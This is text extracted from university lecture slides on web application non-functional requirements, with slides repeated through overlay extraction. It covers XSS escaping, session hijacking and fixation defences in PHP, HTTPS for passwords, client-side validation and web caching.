Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS (Cont’d)I When the above rules are followed, the only

place remaining to insert data is in thecontent of a HTML element, for examplediv, p or td.

I When accepting input that might later beinserted in a HTML document, always usethe htmlentities function to convertHTML special characters like < and & toentities (&lt; and &amp;).htmlentities($data, ENT_QUOTES);

I The ENT_QUOTES parameter specifiesthat both single and double quotes shall beconverted.

38 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS (Cont’d)I When the above rules are followed, the only

place remaining to insert data is in thecontent of a HTML element, for examplediv, p or td.

I When accepting input that might later beinserted in a HTML document, always usethe htmlentities function to convertHTML special characters like < and & toentities (&lt; and &amp;).htmlentities($data, ENT_QUOTES);

I The ENT_QUOTES parameter specifiesthat both single and double quotes shall beconverted.

38 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting XSS (Cont’d)I When the above rules are followed, the only

place remaining to insert data is in thecontent of a HTML element, for examplediv, p or td.

I When accepting input that might later beinserted in a HTML document, always usethe htmlentities function to convertHTML special characters like < and & toentities (&lt; and &amp;).htmlentities($data, ENT_QUOTES);

I The ENT_QUOTES parameter specifiesthat both single and double quotes shall beconverted.

38 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SectionNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

39 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Impersonation

I To impersonate someone means that anattacker steals the id of a legitimate user,thereby becoming able to perform actionsfor which the legitimate user will be heldresponsible.

I Two ways this can happen is that theattacker steals a password of a legitimateuser, or uses a session of an authenticated(logged in) user.

40 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Impersonation

I To impersonate someone means that anattacker steals the id of a legitimate user,thereby becoming able to perform actionsfor which the legitimate user will be heldresponsible.

I Two ways this can happen is that theattacker steals a password of a legitimateuser, or uses a session of an authenticated(logged in) user.

40 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Password Protection

I We have already covered how to protect apassword in a datastore by hashing it.

I It is also necessary to protect the passwordwhen it is transmitted from client to server.

I This is achieved by using encryptedcommunication, typically HTTPS. Alwaysuse HTTPS when a password is sent!

I If not, the password is sent in clear text andanyone with access to the communicationlink can see it (commonly calledeavesdropping).

41 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Password Protection

I We have already covered how to protect apassword in a datastore by hashing it.

I It is also necessary to protect the passwordwhen it is transmitted from client to server.

I This is achieved by using encryptedcommunication, typically HTTPS. Alwaysuse HTTPS when a password is sent!

I If not, the password is sent in clear text andanyone with access to the communicationlink can see it (commonly calledeavesdropping).

41 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Password Protection

I We have already covered how to protect apassword in a datastore by hashing it.

I It is also necessary to protect the passwordwhen it is transmitted from client to server.

I This is achieved by using encryptedcommunication, typically HTTPS. Alwaysuse HTTPS when a password is sent!

I If not, the password is sent in clear text andanyone with access to the communicationlink can see it (commonly calledeavesdropping).

41 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Password Protection

I We have already covered how to protect apassword in a datastore by hashing it.

I It is also necessary to protect the passwordwhen it is transmitted from client to server.

I This is achieved by using encryptedcommunication, typically HTTPS. Alwaysuse HTTPS when a password is sent!

I If not, the password is sent in clear text andanyone with access to the communicationlink can see it (commonly calledeavesdropping).

41 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Session Forgery

I The only thing telling the server that tworequests belong to the same session, andthereby the same user, is the session id.

I This id must be included in every requestduring the session, as a cookie, part of theURL or some other way.

I If an attacker is able to get (or set) thesession id of an authenticated user, there isnothing stopping the attacker frompresenting that id to the server andimpersonate that user.

42 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Session Forgery

I The only thing telling the server that tworequests belong to the same session, andthereby the same user, is the session id.

I This id must be included in every requestduring the session, as a cookie, part of theURL or some other way.

I If an attacker is able to get (or set) thesession id of an authenticated user, there isnothing stopping the attacker frompresenting that id to the server andimpersonate that user.

42 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Session Forgery

I The only thing telling the server that tworequests belong to the same session, andthereby the same user, is the session id.

I This id must be included in every requestduring the session, as a cookie, part of theURL or some other way.

I If an attacker is able to get (or set) thesession id of an authenticated user, there isnothing stopping the attacker frompresenting that id to the server andimpersonate that user.

42 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting Session HijackingI Session hijacking means that a malicious user uses

the same session as an authenticated user.

I The first thing is to prohibit eavesdropping, by usingHTTPS for all requests made by an authenticateduser.

I Also, setting the Secure cookie attribute instructsweb browsers to send the cookie only overencrypted, e.g., HTTPS, links. This is specified bysetting session.cookie_secure true inthe php.ini configuration file.

I Setting the HttpOnly attribute by specifyingsession.cookie_httponly true prohibitsJavaScript code to read the cookie via the DOMdocument.cookie JavaScript object.

43 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting Session HijackingI Session hijacking means that a malicious user uses

the same session as an authenticated user.

I The first thing is to prohibit eavesdropping, by usingHTTPS for all requests made by an authenticateduser.

I Also, setting the Secure cookie attribute instructsweb browsers to send the cookie only overencrypted, e.g., HTTPS, links. This is specified bysetting session.cookie_secure true inthe php.ini configuration file.

I Setting the HttpOnly attribute by specifyingsession.cookie_httponly true prohibitsJavaScript code to read the cookie via the DOMdocument.cookie JavaScript object.

43 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting Session HijackingI Session hijacking means that a malicious user uses

the same session as an authenticated user.

I The first thing is to prohibit eavesdropping, by usingHTTPS for all requests made by an authenticateduser.

I Also, setting the Secure cookie attribute instructsweb browsers to send the cookie only overencrypted, e.g., HTTPS, links. This is specified bysetting session.cookie_secure true inthe php.ini configuration file.

I Setting the HttpOnly attribute by specifyingsession.cookie_httponly true prohibitsJavaScript code to read the cookie via the DOMdocument.cookie JavaScript object.

43 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting Session HijackingI Session hijacking means that a malicious user uses

the same session as an authenticated user.

I The first thing is to prohibit eavesdropping, by usingHTTPS for all requests made by an authenticateduser.

I Also, setting the Secure cookie attribute instructsweb browsers to send the cookie only overencrypted, e.g., HTTPS, links. This is specified bysetting session.cookie_secure true inthe php.ini configuration file.

I Setting the HttpOnly attribute by specifyingsession.cookie_httponly true prohibitsJavaScript code to read the cookie via the DOMdocument.cookie JavaScript object.

43 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting Session Hijacking(Cont’d)

I Another complementary practice is to rely not onlyon the session id for identification, but also onbrowser fingerprinting.

I Browsers normally include many headers in eachrequest, for example User-Agent, whichidentifies the browser type.

I To associate all this information with the session canreveal if a request comes from another browser. It ishighly unlikely that a legitimate user changesbrowser during a session.

I This method is not 100% secure, the attacker mightbe able to imitate the browser’s fingerprint, but it stilla recommended complementary method to preventsession hijacking.

44 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting Session Hijacking(Cont’d)

I Another complementary practice is to rely not onlyon the session id for identification, but also onbrowser fingerprinting.

I Browsers normally include many headers in eachrequest, for example User-Agent, whichidentifies the browser type.

I To associate all this information with the session canreveal if a request comes from another browser. It ishighly unlikely that a legitimate user changesbrowser during a session.

I This method is not 100% secure, the attacker mightbe able to imitate the browser’s fingerprint, but it stilla recommended complementary method to preventsession hijacking.

44 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting Session Hijacking(Cont’d)

I Another complementary practice is to rely not onlyon the session id for identification, but also onbrowser fingerprinting.

I Browsers normally include many headers in eachrequest, for example User-Agent, whichidentifies the browser type.

I To associate all this information with the session canreveal if a request comes from another browser. It ishighly unlikely that a legitimate user changesbrowser during a session.

I This method is not 100% secure, the attacker mightbe able to imitate the browser’s fingerprint, but it stilla recommended complementary method to preventsession hijacking.

44 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibiting Session Hijacking(Cont’d)

I Another complementary practice is to rely not onlyon the session id for identification, but also onbrowser fingerprinting.

I Browsers normally include many headers in eachrequest, for example User-Agent, whichidentifies the browser type.

I To associate all this information with the session canreveal if a request comes from another browser. It ishighly unlikely that a legitimate user changesbrowser during a session.

I This method is not 100% secure, the attacker mightbe able to imitate the browser’s fingerprint, but it stilla recommended complementary method to preventsession hijacking.

44 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit Session FixationI Session fixation means that an attacker is able to

decide which session id a user will have after havinglogged in.

I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.

I When the legitimate user later has logged in, anattack can be launched with the preset session id.

I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.

I In PHP, session id is changed with thesession_regenerate_id function.

45 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit Session FixationI Session fixation means that an attacker is able to

decide which session id a user will have after havinglogged in.

I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.

I When the legitimate user later has logged in, anattack can be launched with the preset session id.

I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.

I In PHP, session id is changed with thesession_regenerate_id function.

45 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit Session FixationI Session fixation means that an attacker is able to

decide which session id a user will have after havinglogged in.

I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.

I When the legitimate user later has logged in, anattack can be launched with the preset session id.

I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.

I In PHP, session id is changed with thesession_regenerate_id function.

45 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit Session FixationI Session fixation means that an attacker is able to

decide which session id a user will have after havinglogged in.

I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.

I When the legitimate user later has logged in, anattack can be launched with the preset session id.

I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.

I In PHP, session id is changed with thesession_regenerate_id function.

45 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit Session FixationI Session fixation means that an attacker is able to

decide which session id a user will have after havinglogged in.

I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.

I When the legitimate user later has logged in, anattack can be launched with the preset session id.

I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.

I In PHP, session id is changed with thesession_regenerate_id function.

45 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Force the User to AuthenticateI Do not assume that a user is authenticated just

because there is a session.

I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.

I To stop such an attack, it must be possible todetermine if a user is authenticated or not.

I This can be done by storing an object with userinformation in the session on successful log in.

I Only if there is such information is the user loggedin, remember to check for all requests!

I A positive side effect is that it easy to get informationabout the current user from this object.

46 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Force the User to AuthenticateI Do not assume that a user is authenticated just

because there is a session.

I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.

I To stop such an attack, it must be possible todetermine if a user is authenticated or not.

I This can be done by storing an object with userinformation in the session on successful log in.

I Only if there is such information is the user loggedin, remember to check for all requests!

I A positive side effect is that it easy to get informationabout the current user from this object.

46 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Force the User to AuthenticateI Do not assume that a user is authenticated just

because there is a session.

I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.

I To stop such an attack, it must be possible todetermine if a user is authenticated or not.

I This can be done by storing an object with userinformation in the session on successful log in.

I Only if there is such information is the user loggedin, remember to check for all requests!

I A positive side effect is that it easy to get informationabout the current user from this object.

46 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Force the User to AuthenticateI Do not assume that a user is authenticated just

because there is a session.

I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.

I To stop such an attack, it must be possible todetermine if a user is authenticated or not.

I This can be done by storing an object with userinformation in the session on successful log in.

I Only if there is such information is the user loggedin, remember to check for all requests!

I A positive side effect is that it easy to get informationabout the current user from this object.

46 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Force the User to AuthenticateI Do not assume that a user is authenticated just

because there is a session.

I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.

I To stop such an attack, it must be possible todetermine if a user is authenticated or not.

I This can be done by storing an object with userinformation in the session on successful log in.

I Only if there is such information is the user loggedin, remember to check for all requests!

I A positive side effect is that it easy to get informationabout the current user from this object.

46 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Force the User to AuthenticateI Do not assume that a user is authenticated just

because there is a session.

I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.

I To stop such an attack, it must be possible todetermine if a user is authenticated or not.

I This can be done by storing an object with userinformation in the session on successful log in.

I Only if there is such information is the user loggedin, remember to check for all requests!

I A positive side effect is that it easy to get informationabout the current user from this object.

46 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Enable Logging Out

I Provide an easily accessible logout button,available on every page.

I If not, an unaware user might forget to logout, thereby preserving the session for anunnecessarily long period, increasing therisk of an attack.

47 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Enable Logging Out

I Provide an easily accessible logout button,available on every page.

I If not, an unaware user might forget to logout, thereby preserving the session for anunnecessarily long period, increasing therisk of an attack.

47 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Section

Non-Functional Requirements

Security

PerformanceClient-Side ValidationCachingPersistent Connections

48 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Performance?I Performance is a vague concept, many

different kinds of performance can beconsidered.

I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.

I Here, we will consider the following twoquantities:

I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.

I Throughput, which is the amount of requestsserved during a specified time period.

49 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Performance?I Performance is a vague concept, many

different kinds of performance can beconsidered.

I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.

I Here, we will consider the following twoquantities:

I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.

I Throughput, which is the amount of requestsserved during a specified time period.

49 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Performance?I Performance is a vague concept, many

different kinds of performance can beconsidered.

I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.

I Here, we will consider the following twoquantities:

I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.

I Throughput, which is the amount of requestsserved during a specified time period.

49 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Performance?I Performance is a vague concept, many

different kinds of performance can beconsidered.

I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.

I Here, we will consider the following twoquantities:

I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.

I Throughput, which is the amount of requestsserved during a specified time period.

49 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

What Is Performance?I Performance is a vague concept, many

different kinds of performance can beconsidered.

I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.

I Here, we will consider the following twoquantities:

I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.

I Throughput, which is the amount of requestsserved during a specified time period.

49 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SectionNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

50 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Client-Side Validation

I Client-side validation means that user inputis validated in JavaScript, in the browser.

I Both response time and throughput areimproved by client-side validation, since norequest is sent to server when user input isinvalid.

I A reasonable amount of client-sidevalidation is to perform the same validationsas on the server.

I There must also be server-side validation,since we can never trust the client.

51 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Client-Side Validation

I Client-side validation means that user inputis validated in JavaScript, in the browser.

I Both response time and throughput areimproved by client-side validation, since norequest is sent to server when user input isinvalid.

I A reasonable amount of client-sidevalidation is to perform the same validationsas on the server.

I There must also be server-side validation,since we can never trust the client.

51 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Client-Side Validation

I Client-side validation means that user inputis validated in JavaScript, in the browser.

I Both response time and throughput areimproved by client-side validation, since norequest is sent to server when user input isinvalid.

I A reasonable amount of client-sidevalidation is to perform the same validationsas on the server.

I There must also be server-side validation,since we can never trust the client.

51 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Client-Side Validation

I Client-side validation means that user inputis validated in JavaScript, in the browser.

I Both response time and throughput areimproved by client-side validation, since norequest is sent to server when user input isinvalid.

I A reasonable amount of client-sidevalidation is to perform the same validationsas on the server.

I There must also be server-side validation,since we can never trust the client.

51 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SectionNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

52 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

CachingI Multiple request are sent when loading one

single page: images, JavaScript files, CSSfiles, etc.

I As an example, kth.se generates 34requests and dn.se generates 271.

I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.

I Response time and throughput improves alot by appropriate use of caches.

I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.

53 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

CachingI Multiple request are sent when loading one

single page: images, JavaScript files, CSSfiles, etc.

I As an example, kth.se generates 34requests and dn.se generates 271.

I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.

I Response time and throughput improves alot by appropriate use of caches.

I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.

53 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

CachingI Multiple request are sent when loading one

single page: images, JavaScript files, CSSfiles, etc.

I As an example, kth.se generates 34requests and dn.se generates 271.

I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.

I Response time and throughput improves alot by appropriate use of caches.

I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.

53 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

CachingI Multiple request are sent when loading one

single page: images, JavaScript files, CSSfiles, etc.

I As an example, kth.se generates 34requests and dn.se generates 271.

I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.

I Response time and throughput improves alot by appropriate use of caches.

I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.

53 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

CachingI Multiple request are sent when loading one

single page: images, JavaScript files, CSSfiles, etc.

I As an example, kth.se generates 34requests and dn.se generates 271.

I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.

I Response time and throughput improves alot by appropriate use of caches.

I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.

53 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Types of CachesI The most effective cache is the browser cache. A hit

in the browser cache eliminates network traffic.

I Proxy caches are typically set up by ISPs to reducetheir network traffic. Squid, squid-cache.org isan example of a proxy cache.

I A gateway cache is set up by the serveradministrator, in front of the web server. Acommonly used gateway cache is Varnish,www.varnish-cache.org

I Content delivery networks, CDNs, distributegateway caches throughout the Internet and sellcaching to interested Web sites. Common examplesare Akamai (used by svtplay.se) and CloudFlare(used by cdnjs)

54 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Types of CachesI The most effective cache is the browser cache. A hit

in the browser cache eliminates network traffic.

I Proxy caches are typically set up by ISPs to reducetheir network traffic. Squid, squid-cache.org isan example of a proxy cache.

I A gateway cache is set up by the serveradministrator, in front of the web server. Acommonly used gateway cache is Varnish,www.varnish-cache.org

I Content delivery networks, CDNs, distributegateway caches throughout the Internet and sellcaching to interested Web sites. Common examplesare Akamai (used by svtplay.se) and CloudFlare(used by cdnjs)

54 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Types of CachesI The most effective cache is the browser cache. A hit

in the browser cache eliminates network traffic.

I Proxy caches are typically set up by ISPs to reducetheir network traffic. Squid, squid-cache.org isan example of a proxy cache.

I A gateway cache is set up by the serveradministrator, in front of the web server. Acommonly used gateway cache is Varnish,www.varnish-cache.org

I Content delivery networks, CDNs, distributegateway caches throughout the Internet and sellcaching to interested Web sites. Common examplesare Akamai (used by svtplay.se) and CloudFlare(used by cdnjs)

54 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Types of CachesI The most effective cache is the browser cache. A hit

in the browser cache eliminates network traffic.

I Proxy caches are typically set up by ISPs to reducetheir network traffic. Squid, squid-cache.org isan example of a proxy cache.

I A gateway cache is set up by the serveradministrator, in front of the web server. Acommonly used gateway cache is Varnish,www.varnish-cache.org

I Content delivery networks, CDNs, distributegateway caches throughout the Internet and sellcaching to interested Web sites. Common examplesare Akamai (used by svtplay.se) and CloudFlare(used by cdnjs)

54 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Types of Caches (Cont’d)

I The web server itself has a cache, seehttpd.apache.org/docs/2.2/caching.html for information oncaching with apache. Although this doesnot reduce network traffic, it might eliminatedatabase calls and PHP execution.

